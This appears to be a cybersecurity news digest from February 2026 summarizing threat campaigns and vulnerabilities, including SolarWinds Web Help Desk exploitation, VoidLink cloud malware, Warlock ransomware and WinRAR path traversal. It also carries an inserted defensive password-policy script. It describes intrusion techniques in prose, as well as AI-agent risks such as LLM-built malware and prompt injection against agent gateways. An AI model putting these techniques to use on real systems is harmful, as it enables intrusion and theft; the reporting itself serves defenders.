
News Summary

Last updated: 20:31 09/02/2026 UTC
  • **Chinese State-Sponsored Actors Target Global Critical Infrastructure**: Chinese state-sponsored APT actors have dramatically escalated cyber operations against Taiwan and expanded into Southeast Asia, with Taiwan’s National Security Bureau (NSB) reporting 960,620,609 intrusion attempts in 2025, a 6% year-over-year increase and a 112.5% surge since 2023. The energy sector faced a tenfold spike in attacks, while emergency/hospital systems saw a 54% rise, including ransomware deployments disrupting operations in at least 20 hospitals and stolen medical data sold on dark web forums. In February 2026, Singapore’s Cyber Security Agency (CSA) disclosed that UNC3886, a China-nexus APT group, launched a targeted cyber espionage campaign against all four of Singapore’s major telecommunications operators (M1, SIMBA Telecom, Singtel, StarHub). The actors weaponized a zero-day exploit to bypass perimeter defenses, deployed rootkits for persistence, and exfiltrated technical data, though no personal customer data was compromised. Singapore’s CYBER GUARDIAN operation successfully disrupted UNC3886’s access and expanded monitoring capabilities. The campaigns, attributed to BlackTech, Flax Typhoon, Mustang Panda, APT41, and UNC3886, leverage hardware/software vulnerabilities, DDoS, social engineering, and supply-chain compromises, often correlating with PLA military drills, political events, and visits by Taiwanese officials. Taiwan’s NSB is now collaborating with 30+ countries on joint investigations, while advisories from CISA, NSA, and allies warn of a shift from espionage to potential disruptive capabilities. Earlier phases targeted U.S. government agencies (CBO, Treasury, CFIUS), European telecoms, and global critical infrastructure via exploits in Cisco, Ivanti, Palo Alto, and Citrix devices.
  • **VoidLink Malware Framework Targets Cloud and Container Environments**: VoidLink is a Linux-based command-and-control (C2) framework capable of long-term intrusion across cloud and enterprise environments. The malware generates implant binaries designed for credential theft, data exfiltration, and stealthy persistence on compromised systems. VoidLink combines multi-cloud targeting with container and kernel awareness in a single Linux implant, fingerprinting environments across major cloud providers and adjusting its behavior based on what it finds. The implant harvests credentials from environment variables, configuration files, and metadata APIs, and profiles security controls, kernel versions, and container runtimes before activating additional modules. VoidLink employs a modular plugin-based architecture that loads functionality as needed, including credential harvesting, environment fingerprinting, container escape, Kubernetes privilege escalation, and kernel-level stealth. The malware uses AES-256-GCM over HTTPS for encrypted C2 traffic, designed to resemble normal web activity. VoidLink stands out for its apparent development using a large language model (LLM) coding agent with limited human review, as indicated by unusual development artifacts such as structured "Phase X:" labels, verbose debug logs, and documentation left inside the production binary. The research concludes that VoidLink is not a proof-of-concept but an operational implant with live infrastructure, highlighting how AI-assisted development is lowering the barrier to producing functional, modular, and hard-to-detect malware.
  • **Multiple Critical Vulnerabilities in SolarWinds Web Help Desk**: SolarWinds has released security updates to address multiple critical vulnerabilities in SolarWinds Web Help Desk, including CVE-2025-40536, CVE-2025-40537, CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, and CVE-2025-40554. These vulnerabilities could result in authentication bypass and remote code execution (RCE). CVE-2025-40551 is actively exploited in attacks and has been added to CISA's KEV catalog. SolarWinds Web Help Desk is used by more than 300,000 customers worldwide, including government agencies, large corporations, healthcare organizations, and educational institutions. SolarWinds had previously released a third patch to address a critical deserialization vulnerability (CVE-2025-26399) in Web Help Desk 12.8.7 and earlier versions. This flaw allows unauthenticated remote code execution (RCE) on affected systems. The vulnerability was discovered by an anonymous researcher and reported through Trend Micro's Zero Day Initiative (ZDI). The flaw is a patch bypass for CVE-2024-28988, which itself was a bypass for CVE-2024-28986. The original vulnerability was exploited in the wild and added to the KEV catalog by CISA. SolarWinds advises users to update to version 12.8.7 HF1 to mitigate the risk. SolarWinds Web Help Desk is a help desk and ticketing suite used by medium-to-large organizations for IT support request tracking, workflow automation, asset management, and compliance assurance. The vulnerability affects the AjaxProxy component, and the hotfix requires replacing specific JAR files. Microsoft has revealed that it observed a multi-stage intrusion in which the threat actors exploited internet-exposed SolarWinds Web Help Desk (WHD) instances to obtain initial access and moved laterally across the organization's network to other high-value assets. The attackers used legitimate components associated with Zoho ManageEngine to enable persistent remote control over the infected system. They enumerated sensitive domain users and groups, established persistence via reverse SSH and RDP access, and conducted a DCSync attack to request password hashes and other sensitive information from an Active Directory (AD) database. Threat actors have been exploiting CVE-2025-40551 and CVE-2025-26399 to deploy legitimate tools, such as Zoho ManageEngine and Velociraptor, for malicious purposes. The attackers targeted at least three organizations and leveraged Cloudflare tunnels for persistence. The malicious activity was spotted by researchers at Huntress Security and is believed to be part of a campaign that started on January 16. The attackers used Velociraptor for command and control (C2) and Zoho ManageEngine for remote monitoring and management. The attackers installed the Zoho ManageEngine Assist agent via an MSI file fetched from the Catbox file-hosting platform and configured the tool for unattended access. They registered the compromised host to a Zoho Assist account tied to an anonymous Proton Mail address. The attackers used Velociraptor as a C2 framework that communicates with them via Cloudflare Workers. The attackers used an outdated version of Velociraptor (0.73.4), which is vulnerable to a privilege escalation flaw. The attackers installed Cloudflared from Cloudflare's official GitHub repository as a secondary tunnel-based access channel for C2 redundancy. The attackers disabled Windows Defender and Firewall via registry modifications to ensure that fetching additional payloads would not be blocked. The attackers downloaded a fresh copy of the VS Code binary approximately a second after disabling Defender. System administrators are recommended to upgrade SolarWinds Web Help Desk to version 2026.1 or later, remove public internet access to SolarWinds WHD admin interfaces, and reset all credentials associated with the product.
  • **Warlock Ransomware Exploits Vulnerable SharePoint Servers**: Warlock ransomware, potentially linked to Black Basta, targets unpatched on-premises Microsoft SharePoint servers. The ransomware leverages multiple vulnerabilities (CVE-2025-49706, CVE-2025-49704, CVE-2025-53770, CVE-2025-53771) to gain initial access, escalate privileges, and deploy ransomware. The campaign includes extensive reconnaissance and evasion techniques, targeting security software to avoid detection. The threat actor Storm-2603, associated with China-backed groups, has been observed using Warlock ransomware in these attacks. The ransomware gang recently auctioned files stolen from Colt Technology Services, confirming customer data was compromised. Organizations are urged to apply available patches and implement comprehensive security measures to mitigate the risk. The ToolShell exploit chain, involving CVE-2025-53770 and CVE-2025-53771, was first publicly disclosed in mid-July 2025. Chinese-based threat groups Linen Typhoon and Violet Typhoon have been actively targeting SharePoint vulnerabilities since July 2025. Active exploitation of ToolShell vulnerabilities was first observed on July 18, 2025, a day before Microsoft's emergency advisory. Cisco Talos reported that nearly all their incident response engagements related to ToolShell activity began within 10 days of the vulnerabilities being disclosed. Network segmentation is crucial to prevent lateral movement within an organization following a ToolShell exploit. Recently, SmarterTools fell victim to a ransomware attack through an unpatched instance of its SmarterMail email server. The incident occurred on January 29 and impacted the company’s office network and a data center hosting quality control testing systems, SmarterTools’ portal, and its Hosted SmarterTrack network. The attack was perpetrated by the Warlock ransomware group, which is believed to be operating out of China. The hackers likely exploited CVE-2026-24423, an unauthenticated remote code execution (RCE) vulnerability that was patched on January 15. Customers are advised to update to the latest version of SmarterMail as soon as possible.
  • **Microsoft Anti-Spam Service Misidentifies Safe URLs in Exchange Online and Teams**: Microsoft is addressing a bug in its anti-spam service that incorrectly blocks URLs in Exchange Online and Microsoft Teams, causing some emails to be quarantined. The issue began on September 5, 2025, affecting users who received false alerts about malicious URLs. Over 6,000 URLs have been identified as affected, and Microsoft is working to unblock them and recover any incorrectly flagged messages. The bug is due to the anti-spam engine mistakenly tagging URLs within other URLs as potentially malicious. Microsoft has deployed a partial fix and is continuing to address the impact. The incident has been classified as an event with noticeable user impact, although the exact number of affected customers and regions remains undisclosed. In a new development, on February 5, 2026, another incident began where Exchange Online mistakenly flags legitimate emails as phishing and quarantines them. This issue is caused by a new URL rule that incorrectly flags some URLs as malicious. Microsoft is working to release quarantined emails and confirm that legitimate URLs are unblocked. Similar issues have occurred throughout the year, including a May 2025 incident where a machine learning model incorrectly flagged Gmail emails as spam in Exchange Online.
  • **Massive FanDuel Fraud Scheme Using Stolen Identities**: Two Connecticut men, Amitoj Kapoor and Siddharth Lillaney, have been charged with defrauding FanDuel and other online gambling sites of $3 million over several years using the stolen identities of approximately 3,000 victims. The scheme involved purchasing stolen personally identifiable information (PII) from darknet markets and Telegram, creating fraudulent accounts, and exploiting promotional bonuses. The defendants used background-check services to verify identities and organized the stolen data in a spreadsheet. They transferred winnings to virtual stored-value cards and moved fraudulent proceeds to their bank and investment accounts. The indictment was returned by a federal grand jury in New Haven on February 3, 2026, and the defendants were released on a $300,000 bond each pending further proceedings.
  • **Critical Zero-Click RCE Flaw in Claude Desktop Extensions**: A critical zero-click remote code execution (RCE) vulnerability in Claude Desktop Extensions (DXT) allows attackers to compromise systems via malicious Google Calendar events. The flaw, rated CVSS 10.0, affects over 10,000 users. Anthropic, the developer, declined to fix it, stating it falls outside their threat model. The vulnerability arises from the lack of security boundaries in the Model Context Protocol (MCP) used by Claude DXT, which executes with full system privileges.
Last updated: 20:15 09/02/2026 UTC
  • **Multiple Critical n8n Workflow Automation Vulnerabilities (CVE-2025-68613, CVE-2025-68668, CVE-2026-21877, CVE-2026-21858)**: Multiple critical vulnerabilities in the n8n workflow automation platform continue to pose severe risks, with the latest flaw, CVE-2026-25049 (CVSS 9.4), enabling authenticated users to execute arbitrary system commands via malicious workflows. This vulnerability bypasses earlier patches for CVE-2025-68613 and stems from inadequate sanitization in n8n’s expression evaluation, allowing attackers to exploit mismatches between TypeScript’s compile-time type system and JavaScript’s runtime behavior. Successful exploitation can lead to server compromise, credential theft, and persistent backdoor installation, with heightened risk when paired with n8n’s public webhook feature. The vulnerabilities collectively affect over 105,000 exposed instances, primarily in the U.S. and Europe, and impact both self-hosted and cloud deployments. Earlier flaws, including CVE-2026-21877 (CVSS 10.0), CVE-2026-21858 (CVSS 10.0), and the sandbox escape vulnerabilities CVE-2026-1470 (CVSS 9.9) and CVE-2026-0863 (CVSS 8.5), have already demonstrated the potential for full server takeover, AI workflow hijacking, and exposure of sensitive credentials (API keys, OAuth tokens, database passwords). Patches are available in versions 1.123.17, 2.4.5, 2.5.1, and 2.5.2, but unpatched systems remain at critical risk. Users are urged to upgrade immediately, restrict workflow permissions, and harden deployment environments to mitigate exposure.
  • **Zendesk Platform Abused for Email Flood Attacks**: Cybercriminals have exploited lax authentication settings in Zendesk to flood targeted email inboxes with spam messages. The attacks use hundreds of Zendesk corporate customers simultaneously, sending notifications from customer domain names. Zendesk acknowledged the issue and is investigating additional preventive measures. The abuse involves sending ticket creation notifications from customer accounts that allow anonymous submissions. This allows attackers to create support tickets with any chosen subject line, including menacing or insulting messages. The notifications appear to come from legitimate customer domains, making them harder to filter out. The spam wave started on January 18th, 2026, with victims reporting receiving hundreds of emails. Companies impacted include Discord, Tinder, Riot Games, Dropbox, CD Projekt (2k.com), Maya Mobile, NordVPN, Tennessee Department of Labor, Tennessee Department of Revenue, Lightspeed, CTL, Kahoot, Headspace, and Lime. Zendesk has introduced new safety features to detect and stop this type of spam in the future. A fresh wave of spam hit inboxes worldwide on February 4th, 2026, with users reporting being bombarded by automated emails generated through companies' unsecured Zendesk support systems. The emails had subject lines such as 'Activate your account' and similar support-style notifications appearing to originate from different companies.
  • **React Native CLI Remote Code Execution Vulnerability (CVE-2025-11953)**: A critical security flaw in the React Native CLI package, tracked as CVE-2025-11953, allowed remote, unauthenticated attackers to execute arbitrary OS commands on development servers. The vulnerability affected versions 4.8.0 through 20.0.0-alpha.2 of the @react-native-community/cli-server-api package, impacting millions of developers using the React Native framework. The flaw was patched in version 20.0.0. The vulnerability is being actively exploited in the wild, with attacks observed on December 21, 2025, January 4, 2026, and January 21, 2026. The attacks involve delivering base64-encoded PowerShell payloads hidden in the HTTP POST body of malicious requests. The payloads disable endpoint protections, establish a raw TCP connection to attacker-controlled infrastructure, write data to disk, and execute the downloaded binary. Approximately 3,500 exposed React Native Metro servers are still online, according to scans using the ZoomEye search engine. Despite active exploitation being observed for over a month, the vulnerability still carries a low score in the Exploit Prediction Scoring System (EPSS). The vulnerability affects Windows, Linux, and macOS systems, with varying levels of control over executed commands. The flaw was discovered by researchers at JFrog and disclosed in early November 2025. The vulnerability is dubbed Metro4Shell by VulnCheck. The Windows payload is a Rust-based UPX-packed binary with basic anti-analysis logic, and the same attacker infrastructure hosts corresponding Linux binaries, indicating cross-platform targeting.
  • **Path Traversal Vulnerability in WinRAR Actively Exploited by Multiple Threat Actors**: A path traversal vulnerability in WinRAR (CVE-2025-8088, CVSS 8.8) is being actively exploited in the wild. The flaw allows arbitrary code execution by crafting malicious archive files. The vulnerability affects Windows versions of WinRAR, RAR, UnRAR, portable UnRAR source code, and UnRAR.dll. The issue was discovered by researchers from ESET and addressed in WinRAR version 7.13, released on July 30, 2025. Multiple threat actors, including Paper Werewolf, RomCom, UNC4895, APT44, TEMP.Armageddon, Turla, and China-linked actors, have exploited this vulnerability to target various organizations. A new threat actor called Amaranth Dragon, linked to APT41 state-sponsored Chinese operations, has also exploited CVE-2025-8088 in espionage attacks on government and law enforcement agencies in Singapore, Thailand, Indonesia, Cambodia, Laos, and the Philippines. The attacks involve phishing emails with malicious archives that, when opened, exploit the vulnerability to write files outside the intended directory and achieve code execution. The payloads include a .NET loader that sends system information to an external server and receives additional malware. Financially motivated actors are also exploiting the flaw to distribute commodity remote access tools and information stealers. Google Threat Intelligence Group (GTIG) revealed that multiple threat actors, including nation-state adversaries and financially motivated groups, are exploiting the WinRAR vulnerability CVE-2025-8088. The exploit chain often involves concealing the malicious file within the alternate data streams (ADS) of a decoy file inside the archive, causing the payload to be extracted to a specific path (e.g., the Windows Startup folder) and automatically executed once the user logs in to the machine after a restart.
  • **Multiple vulnerabilities in Citrix, Git, and GitLab added to CISA KEV catalog**: CISA has added multiple vulnerabilities to its KEV catalog due to active exploitation. The flaws affect Citrix Session Recording, Git, and Citrix NetScaler ADC and NetScaler Gateway. The Citrix Session Recording vulnerabilities were patched in November 2024, the Git flaw (CVE-2025-48384) was addressed in July 2025, and the NetScaler vulnerabilities were patched in August 2025. Additionally, CISA has added a five-year-old GitLab vulnerability (CVE-2021-39935) to its KEV catalog, which is actively being exploited in attacks. Federal agencies must apply mitigations by September 15, 2025, for the earlier vulnerabilities, within 48 hours for the NetScaler vulnerabilities, and by February 24, 2026, for the GitLab vulnerability. The vulnerabilities are CVE-2024-8068, CVE-2024-8069, CVE-2025-48384, CVE-2025-7775, CVE-2025-7776, and CVE-2025-8424. The first two affect Citrix Session Recording, the third affects Git, and the last three affect Citrix NetScaler ADC and NetScaler Gateway. CVE-2025-48384 is an arbitrary file write vulnerability in Git due to inconsistent handling of carriage return characters in configuration files. The vulnerability affects macOS and Linux systems, with Windows systems being immune due to differences in control character usage. The flaw was resolved in Git versions 2.43.7, 2.44.4, 2.45.4, 2.46.4, 2.47.3, 2.48.2, 2.49.1, and 2.50.1. The vulnerability impacts software developers using Git on workstations and CI/CD build systems. CVE-2021-39935 is a server-side request forgery (SSRF) flaw in GitLab that allows unauthenticated attackers to access the CI Lint API. The vulnerability affects GitLab CE/EE versions starting from 10.5 before 14.3.6, all versions starting from 14.4 before 14.4.4, and all versions starting from 14.5 before 14.5.2. GitLab patched the flaw in December 2021. CISA added the flaw to its KEV catalog on February 4, 2026, mandating that federal agencies patch it by February 24, 2026. CVE-2025-7775 is a memory overflow vulnerability leading to remote code execution and/or denial-of-service. CVE-2025-7776 is a memory overflow vulnerability leading to unpredictable behavior and denial-of-service. CVE-2025-8424 is an improper access control vulnerability in the NetScaler Management Interface. CVE-2025-7775 has been actively exploited in the wild and was added to the CISA KEV catalog on August 26, 2025, requiring federal agencies to remediate within 48 hours. The vulnerabilities affect both supported and unsupported, end-of-life versions of Citrix NetScaler ADC and NetScaler Gateway. Nearly 20% of NetScaler assets identified are on unsupported versions, primarily in North America and the APAC region. The vulnerabilities affect components in NetScaler ADC and NetScaler Gateway similar to those hit by the CitrixBleed and CitrixBleed2 vulnerabilities.

Latest updates


Multiple Critical Vulnerabilities in SolarWinds Web Help Desk

Updated: 09.02.2026 22:28 · First: 23.09.2025 15:46 · 📰 8 src / 11 articles


Velociraptor DFIR Tool Abused in LockBit and Babuk Ransomware Campaigns

Updated: 09.02.2026 21:08 · First: 09.10.2025 22:31 · 📰 4 src / 5 articles

Threat actors, assessed to be China-based Storm-2603, have started using the Velociraptor digital forensics and incident response (DFIR) tool in ransomware attacks deploying LockBit and Babuk ransomware. The attackers exploited a privilege escalation vulnerability in an outdated version of Velociraptor to gain persistent access and control over virtual machines. The campaign involved creating local admin accounts, disabling security features, and using fileless PowerShell encryptors for data exfiltration and encryption. The ransomware deployed on Windows systems was identified as LockBit, while a Linux binary detected as Babuk ransomware was found on VMware ESXi systems. Storm-2603 initially exploited SharePoint vulnerabilities in July 2025 and deployed Warlock, LockBit, and Babuk ransomware on VMware ESXi servers in August 2025. Sophos CTU researchers first documented Velociraptor abuse by Storm-2603 on August 5, 2025. Storm-2603 used the ToolShell exploit to gain initial access and deployed an outdated version of Velociraptor (version 0.73.4.0) that is susceptible to a privilege escalation vulnerability (CVE-2025-6264), enabling arbitrary command execution and endpoint takeover. The group also used Smbexec to remotely launch programs over the SMB protocol and modified Active Directory (AD) Group Policy Objects (GPOs) to disable real-time protection. Storm-2603 established the infrastructure for the AK47 C2 framework in March 2025 and created the first prototype of the tool the next month. The group pivoted from LockBit-only deployment to dual LockBit/Warlock deployment in April 2025 and used the ToolShell exploit as a zero-day in July 2025. Storm-2603 demonstrated operational flexibility and sophisticated builder expertise using leaked and open-source ransomware frameworks. In a recent breach, SmarterTools confirmed that the Warlock ransomware gang breached its network on January 29, 2026, via a single SmarterMail virtual machine (VM) set up by an employee. The vulnerability exploited in the attack to gain access is CVE-2026-23760, an authentication bypass flaw in SmarterMail before Build 9518, which allows resetting administrator passwords and obtaining full privileges. The attackers moved laterally from that one vulnerable VM via Active Directory, using Windows-centric tooling and persistence methods. The ransomware operators waited roughly a week after gaining initial access, the final stage being encryption of all reachable machines. SentinelOne security products reportedly stopped the final payload from performing encryption, the impacted systems were isolated, and data was restored from fresh backups. Tools used in the attacks include Velociraptor, SimpleHelp, and vulnerable versions of WinRAR, while startup items and scheduled tasks were also used for persistence. ReliaQuest reported that Storm-2603 chains CVE-2026-23760 access with the software’s built-in 'Volume Mount' feature to gain full system control. ReliaQuest also saw probes for CVE-2026-24423, another SmarterMail flaw flagged by CISA as actively exploited by ransomware actors, although the primary vector was CVE-2026-23760.

Critical Zero-Click RCE Flaw in Claude Desktop Extensions

Updated: · First: 09.02.2026 19:30 · 📰 1 src / 1 articles

A critical zero-click remote code execution (RCE) vulnerability in Claude Desktop Extensions (DXT) allows attackers to compromise systems via malicious Google Calendar events. The flaw, rated CVSS 10.0, affects over 10,000 users. Anthropic, the developer, declined to fix it, stating it falls outside their threat model. The vulnerability arises from the lack of security boundaries in the Model Context Protocol (MCP) used by Claude DXT, which executes with full system privileges.

Chinese State-Sponsored Actors Target Global Critical Infrastructure

Updated: 09.02.2026 19:01 · First: 27.08.2025 15:00 · 📰 15 src / 30 articles

Chinese state-sponsored APT actors have **dramatically escalated cyber operations against Taiwan and expanded into Southeast Asia**, with Taiwan’s National Security Bureau (NSB) reporting **960,620,609 intrusion attempts** in 2025—a **6% year-over-year increase** and **112.5% surge since 2023**. The **energy sector** faced a **tenfold spike in attacks**, while **emergency/hospital systems** saw a **54% rise**, including **ransomware deployments** disrupting operations in at least **20 hospitals** and stolen medical data sold on dark web forums. In **February 2026**, Singapore’s Cyber Security Agency (CSA) disclosed that **UNC3886**—a China-nexus APT group—launched a **targeted cyber espionage campaign** against all four of Singapore’s major telecommunications operators (**M1, SIMBA Telecom, Singtel, StarHub**). The actors **weaponized a zero-day exploit** to bypass perimeter defenses, deployed **rootkits for persistence**, and exfiltrated technical data, though no personal customer data was compromised. Singapore’s **CYBER GUARDIAN** operation successfully disrupted UNC3886’s access and expanded monitoring capabilities. The campaigns, attributed to **BlackTech, Flax Typhoon, Mustang Panda, APT41, and UNC3886**, leverage **hardware/software vulnerabilities, DDoS, social engineering, and supply-chain compromises**, often correlating with **PLA military drills, political events, and visits by Taiwanese officials**. Taiwan’s NSB is now collaborating with **30+ countries** on joint investigations, while advisories from **CISA, NSA, and allies** warn of a shift from espionage to **potential disruptive capabilities**. Earlier phases targeted **U.S. government agencies (CBO, Treasury, CFIUS)**, **European telecoms**, and global critical infrastructure via exploits in **Cisco, Ivanti, Palo Alto, and Citrix devices**.

Massive FanDuel Fraud Scheme Using Stolen Identities

Updated: 09.02.2026 18:00 · First: 09.02.2026 13:41 · 📰 2 src / 2 articles

Two Connecticut men, Amitoj Kapoor and Siddharth Lillaney, have been charged with defrauding FanDuel and other online gambling sites of $3 million over several years using stolen identities of approximately 3,000 victims. The scheme involved purchasing stolen personally identifiable information (PII) from darknet markets and Telegram, creating fraudulent accounts, and exploiting promotional bonuses. The defendants used background-check services to verify identities and organized stolen data in a spreadsheet. They transferred winnings to virtual stored-value cards and moved fraudulent proceeds to their bank and investment accounts. The indictment was returned by a federal grand jury in New Haven on February 3, 2026, and the defendants were released on a $300,000 bond each pending further proceedings.

VoidLink Malware Framework Targets Cloud and Container Environments

Updated: 09.02.2026 17:25 · First: 13.01.2026 13:57 · 📰 7 src / 10 articles

VoidLink is a Linux-based command-and-control (C2) framework capable of long-term intrusion across cloud and enterprise environments. The malware generates implant binaries designed for credential theft, data exfiltration, and stealthy persistence on compromised systems. VoidLink combines multi-cloud targeting with container and kernel awareness in a single Linux implant, fingerprinting environments across major cloud providers and adjusting its behavior based on what it finds. The implant harvests credentials from environment variables, configuration files, and metadata APIs, and profiles security controls, kernel versions, and container runtimes before activating additional modules. VoidLink employs a modular plugin-based architecture that loads functionality as needed, including credential harvesting, environment fingerprinting, container escape, Kubernetes privilege escalation, and kernel-level stealth. The malware uses AES-256-GCM over HTTPS for encrypted C2 traffic, designed to resemble normal web activity. VoidLink stands out for its apparent development using a large language model (LLM) coding agent with limited human review, as indicated by unusual development artifacts such as structured "Phase X:" labels, verbose debug logs, and documentation left inside the production binary. The research concludes that VoidLink is not a proof-of-concept but an operational implant with live infrastructure, highlighting how AI-assisted development is lowering the barrier to producing functional, modular, and hard-to-detect malware.

Attackers Exploit Contextual Language for Targeted Password Guesses

Updated: · First: 09.02.2026 17:01 · 📰 1 src / 1 articles

Attackers are leveraging contextual language from organizations' public-facing content to create targeted password wordlists, significantly improving their success rates in credential attacks. Tools like CeWL, an open-source web crawler, extract relevant terminology from websites, which attackers then transform into plausible password guesses. This method bypasses standard complexity requirements and exploits users' tendency to incorporate familiar organizational language into their passwords. The effectiveness of this approach lies in its relevance to the organization's internal vocabulary, making it more likely to match users' password patterns. Defenders are advised to implement controls that block context-derived and known-compromised passwords, enforce longer passphrases, and enable multi-factor authentication (MFA) to mitigate these attacks.
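The defensive control the summary recommends, as an added example that is not code from the article or from CeWL: a password-policy check that normalizes a candidate (lowercasing, undoing common character substitutions, trimming surrounding digits and symbols) and rejects it when it embeds a term from the organization's public vocabulary, appears in a compromised-password list, or is shorter than a passphrase minimum. The vocabulary and compromised-password sets are constructed samples.

```python
"""Policy check that rejects passwords built from an organization's public vocabulary
or found in a known-compromised list. Added example illustrating the defensive control
the summary recommends; not code from the article or from CeWL. The vocabulary and
compromised-password sets below are constructed samples."""
import re

# Constructed sample: terms a crawler would harvest from a fictitious company's website.
ORG_TERMS = {"acme", "widgetco", "summit", "quarterly", "rocket", "denver"}
# Constructed sample standing in for a breach-corpus lookup.
COMPROMISED = {"password", "welcome1", "summer2025", "letmein"}

# Common substitutions users apply to a familiar word to satisfy complexity rules.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t",
                      "@": "a", "$": "s", "!": "i"})


def normalize(password: str) -> str:
    """Lowercase, undo leet substitutions, drop leading/trailing digits and symbols."""
    core = password.lower().translate(LEET)
    return re.sub(r"^[^a-z]+|[^a-z]+$", "", core)


def matching_org_term(password: str, terms=ORG_TERMS, min_term_len: int = 4):
    """Return the longest organizational term embedded in the normalized password, or None."""
    core = normalize(password)
    for term in sorted(terms, key=len, reverse=True):
        if len(term) >= min_term_len and term in core:
            return term
    return None


def check_password(password: str, min_len: int = 16) -> list:
    """Return the list of policy failures; an empty list means the password is acceptable."""
    failures = []
    if len(password) < min_len:
        failures.append(f"shorter than {min_len} characters")
    if password.lower() in COMPROMISED or normalize(password) in COMPROMISED:
        failures.append("appears in known-compromised list")
    term = matching_org_term(password)
    if term:
        failures.append(f"derived from organizational term '{term}'")
    return failures


if __name__ == "__main__":
    for candidate in ("Summ1t2025!!", "Welcome1", "R0cket-Denver-Quarterly-Review",
                      "Correct-Horse-Battery-Staple-42"):
        print(candidate, "->", check_password(candidate) or ["ok"])
```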

Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support and PRA

Updated: 09.02.2026 15:07 · First: 09.02.2026 10:03 · 📰 2 src / 3 articles

BeyondTrust has patched a critical pre-authentication remote code execution (RCE) vulnerability (CVE-2026-1731, CVSS 9.9) in Remote Support (RS) and Privileged Remote Access (PRA) products. The flaw could allow unauthenticated attackers to execute OS commands in the context of the site user, leading to unauthorized access, data exfiltration, and service disruption. The vulnerability affects RS versions 25.3.1 and prior, and PRA versions 24.3.4 and prior. Patches are available in RS versions 25.3.2 and later, and PRA versions 25.1.1 and later. Self-hosted customers must manually apply updates if not subscribed to automatic updates. The vulnerability was discovered on January 31, 2026, with approximately 11,000 exposed instances identified, including around 8,500 on-prem deployments. BeyondTrust secured all RS/PRA cloud systems by February 2, 2026. The flaw was discovered by Harsh Jaiswal and the Hacktron AI team. Threat actors can exploit the flaw through maliciously crafted client requests in low-complexity attacks that do not require user interaction. In June 2025, BeyondTrust fixed a high-severity RS/PRA Server-Side Template Injection vulnerability.

OpenClaw Security Concerns and AI Agent Exploits

Updated: · First: 09.02.2026 14:59 · 📰 1 src / 1 articles

OpenClaw, an AI agent platform, faces significant security concerns as attackers exploit its ecosystem. Malicious skills on ClawHub, a public skills registry, have been discovered, and threat actors are discussing the deployment of OpenClaw skills for botnet operations. The number of malicious packages on npm and PyPI with the name 'claw' has surged, providing new avenues for threat actors. Additionally, attackers are actively scanning exposed OpenClaw gateways, attempting prompt injection and command execution. These developments highlight the risks associated with AI agents' broad permissions and unsupervised deployment.

Warlock Ransomware Exploits Vulnerable SharePoint Servers

Updated: 09.02.2026 14:02 · First: 21.08.2025 00:04 · 📰 4 src / 7 articles

Warlock ransomware, potentially linked to Black Basta, targets unpatched on-premises Microsoft SharePoint servers. The ransomware leverages multiple vulnerabilities (CVE-2025-49706, CVE-2025-49704, CVE-2025-53770, CVE-2025-53771) to gain initial access, escalate privileges, and deploy ransomware. The campaign includes extensive reconnaissance and evasion techniques, targeting security software to avoid detection. The threat actor Storm-2603, associated with China-backed groups, has been observed using Warlock ransomware in these attacks. The ransomware gang recently auctioned files stolen from Colt Technology Services, confirming customer data was compromised. Organizations are urged to apply available patches and implement comprehensive security measures to mitigate the risk. The ToolShell exploit chain, involving CVE-2025-53770 and CVE-2025-53771, was first publicly disclosed in mid-July 2025. Chinese-based threat groups Linen Typhoon and Violet Typhoon have been actively targeting SharePoint vulnerabilities since July 2025. Active exploitation of ToolShell vulnerabilities was first observed on July 18, 2025, a day before Microsoft's emergency advisory. Cisco Talos reported that nearly all their incident response engagements related to ToolShell activity began within 10 days of the vulnerabilities being disclosed. Network segmentation is crucial to prevent lateral movement within an organization following a ToolShell exploit. Recently, SmarterTools fell victim to a ransomware attack through an unpatched instance of its SmarterMail email server. The incident occurred on January 29 and impacted the company’s office network and a data center hosting quality control testing systems, SmarterTools’ portal, and its Hosted SmarterTrack network. The attack was perpetrated by the Warlock ransomware group, which is believed to be operating out of China. 
The hackers likely exploited CVE-2026-24423, an unauthenticated remote code execution (RCE) vulnerability that was patched on January 15. Customers are advised to update to the latest version of SmarterMail as soon as possible.

Top CISOs Improve SOC Efficiency with Sandbox-First and Automated Triage

Updated: · First: 09.02.2026 13:23 · 📰 1 src / 1 articles

Top Chief Information Security Officers (CISOs) are addressing SOC team burnout and reducing Mean Time to Respond (MTTR) by implementing sandbox-first investigation workflows and automating triage. This approach provides faster, clearer behavior evidence, reducing escalations, decision fatigue, and manual steps. The method has shown significant improvements in SOC output, MTTR reduction, and team retention without additional hiring.

Ransomware Attack Disrupts BridgePay Payment Services

Updated: 09.02.2026 13:15 · First: 07.02.2026 11:47 · 📰 2 src / 2 articles

BridgePay, a major U.S. payment gateway provider, confirmed a ransomware attack caused a widespread outage across its platform, affecting multiple services. The incident began on February 6, 2026, and led to significant disruptions for merchants and payment integrators. BridgePay engaged federal law enforcement and forensic teams, reporting no evidence of payment card data compromise. Initial forensic findings indicate that any data accessed by attackers were encrypted. Recovery efforts are ongoing, with no estimated time for full restoration.

Bloody Wolf APT Expands Operations to Russia and Central Asia Using NetSupport RAT

Updated: 09.02.2026 12:58 · First: 27.11.2025 18:00 · 📰 3 src / 4 articles

The Bloody Wolf APT group, also tracked as Stan Ghouls, has expanded its operations to include Russia, targeting government entities, logistics companies, medical facilities, and educational institutions. The campaign has infected about 50 victims in Uzbekistan and 10 devices in Russia, with additional infections identified in Kazakhstan, Turkey, Serbia, and Belarus. The group has shifted from traditional malware to using legitimate remote-access software, specifically NetSupport RAT, deployed via Java-based delivery methods. The campaign involves sophisticated social engineering tactics, including impersonating government ministries and using geofenced infrastructure to deliver malicious payloads. The group's activities have been ongoing since at least June 2025, with a notable increase in operations by October 2025. The campaign has targeted finance, government, and information technology (IT) sectors. The shift to legitimate remote-administration tools indicates an evolution in the group's tactics to evade detection and blend into normal IT activity. The group has also expanded its malware arsenal to target IoT devices, with Mirai botnet payloads staged on associated infrastructure.

Microsoft Anti-Spam Service Misidentifies Safe URLs in Exchange Online and Teams

Updated: 09.02.2026 12:47 · First: 09.09.2025 16:40 · 📰 2 src / 3 articles

